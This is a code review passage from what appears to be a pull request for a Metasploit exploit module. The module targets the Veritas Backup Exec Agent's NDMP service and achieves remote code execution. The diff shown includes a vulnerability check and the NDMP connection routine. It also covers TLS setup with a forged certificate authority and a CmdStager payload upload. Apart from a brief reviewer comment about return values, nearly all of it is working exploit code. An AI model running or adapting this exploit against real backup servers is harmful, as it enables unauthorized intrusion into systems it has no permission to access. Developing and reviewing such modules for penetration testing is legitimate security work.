modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

```diff
@@ -0,0 +1,536 @@
+    else
+      print_status('Uploading payload with CmdStager')
+      execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })
+    end
+  end
+
+  def check
+    print_status('Checking vulnerability')
+
+    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect
+    return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status
+
+    print_status('Getting supported authentication types')
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)
+    )
+    ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)
+    print_line("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|
+                                                          "#{AUTH_TYPES[k]} (#{k})"
+                                                        end.join(', ')}")
+    print_line("BE agent revision: #{ndmp_payload.revision}")
+
+    if ndmp_payload.auth_types.include?(5)
+      Exploit::CheckCode::Appears('SHA authentication is enabled')
+    else
+      Exploit::CheckCode::Safe('SHA authentication is disabled')
+    end
+  end
+
+  def ndmp_connect
+    print_status('Connecting to BE Agent service')
+    ndmp_msg = nil
+    begin
+      ndmp_sock = NDMP::Socket.new(connect)
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,
+           Rex::ConnectionRefused => e
+      return [false, nil, e.to_s]
+    end
+    begin
+      Timeout.timeout(datastore['ConnectTimeout']) do
+        ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)
+      end
+    rescue Timeout::Error
+      return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service']
+    else
+      ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body)
+    end
+
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP::Message::CONNECT_OPEN,
+        NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr
+      )
+    )
+
+    ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"]
+    end
+
+    [true, ndmp_sock, nil]
+  end
+
+  def tls_enabling(ndmp_sock)
+    print_status('Enabling TLS for NDMP connection')
+    ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s)
+    ndmp_tls_certs.forge_ca
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_SSL_HANDSHAKE,
+        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr
+      )
+    )
+    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, nil, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]
```

Comment:
```suggestion
      return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]
```
Your only ever expecting a two item array to be returned, and the second item seems to always be nil?
or potentially make it a hash so it's easier to follow along

Reply:
Fixed